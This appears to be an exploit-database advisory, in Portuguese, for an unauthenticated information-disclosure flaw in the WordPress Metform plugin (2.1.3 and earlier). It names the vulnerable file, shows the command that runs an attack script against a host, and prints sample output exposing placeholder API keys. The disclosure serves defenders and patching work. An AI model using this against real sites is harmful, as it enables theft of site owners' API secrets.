
WordPress Plugin Metform <= 2.1.3 - Controle de Acesso Inadequado que Permite a Divulgação de Informações Sensíveis sem Autenticação
WordPress Plugin Metform <= 2.1.3 - Controle de Acesso Impróprio Permitindo Divulgação Não Autenticada de Informações Sensíveis
O plugin é vulnerável a divulgação de informações sensíveis devido ao controle de acesso impróprio no arquivo ~/core/forms/action.php, que pode ser explorado por um atacante não autenticado para visualizar todas as chaves de API e segredos de APIs de terceiros integradas, como PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA, etc.
bash metform.sh http://wordpress.lan
{
"form_title": "New Form # 1691056894",
"success_message": "Thank you! Form submitted successfully.",
"capture_user_browser_data": "1",
"store_entries": "1",
"entry_title": "Entry # [mf_id]",
"count_views": "1",
"redirect_to": "",
"user_email_subject": "",
"user_email_from": "",
"user_email_reply_to": "",
"user_email_body": "",
"admin_email_subject": "",
"admin_email_to": "",
"admin_email_from": "",
"admin_email_reply_to": "",
"admin_email_body": "",
"mf_mailchimp_list_id": "",
"mf_slack_webhook": "",
"mf_recaptcha_version": "recaptcha-v2",
"mf_recaptcha_site_key": "sfsdffd",
"mf_recaptcha_secret_key": "sfddsf",
"mf_recaptcha_site_key_v3": "",
"mf_recaptcha_secret_key_v3": "",
"mf_mailchimp_api_key": "asdadasdsaddas",
"input_names": "Example: [mf-inputname]",
"ckit_opt": [],
"aweber_opt": [],
"mp_opt": []
}